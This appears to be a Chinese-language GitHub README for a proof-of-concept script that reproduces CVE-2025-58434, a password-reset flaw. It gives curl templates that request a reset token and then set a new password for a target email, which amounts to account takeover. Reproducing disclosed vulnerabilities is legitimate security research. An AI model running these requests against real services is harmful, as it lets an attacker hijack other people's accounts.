mananispiwpiw/CVE-2025-58434-PoC
GitHub: mananispiwpiw/CVE-2025-58434-PoC
一款用于复现和验证 CVE-2025-58434 密码重置接口安全漏洞的 Python 概念验证脚本。
Stars: 0 | Forks: 0
# CVE-2025-58434 PoC
用于触发 `POST /api/v1/account/forgot-password` 的 Python 概念验证脚本。
## 贡献者
- `zaddy6` (Isaac David)
- `arthurgervais` (Arthur Gervais)
## 详情
- `CVE-2025-58434` 的 PoC
- 参考: https://github.com/advisories/GHSA-wgpv-6j63-x5ph
## 文件
- `poc.py`: 提示输入目标机器的 URL/IP、使用裸主机/IP 时的可选协议、目标邮箱和密码;然后发送请求并打印 HTTP 状态码、响应头和响应体,输出效果类似于 `curl -i`
## 使用方法
运行:
```
python3 poc.py
```
然后提供以下信息:
- 目标机器的 URL/IP,例如 `10.10.11.10`、`http://10.10.11.10` 或 `https://target.example`
- 如果提示输入裸主机/IP 的协议,则进行选择
- email 地址
- 密码
## 等效的 curl 命令
### 第一次请求
```
curl -i -X POST https:///api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":""}}'
```
### 第二次请求
```
curl -i -X POST https:///api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"",
"tempToken":"",
"password":"NewSecurePassword123!"
}
}'
```
标签:API安全, CISA项目, CVE-2025-58434, CVE复现, EXP, HTTP请求, JSON输出, Linux取证, Maven, PoC, Web安全, 密码重置, 忘记密码, 暴力破解, 漏洞验证, 网络安全, 蓝队分析, 账户接管, 逆向工具, 隐私保护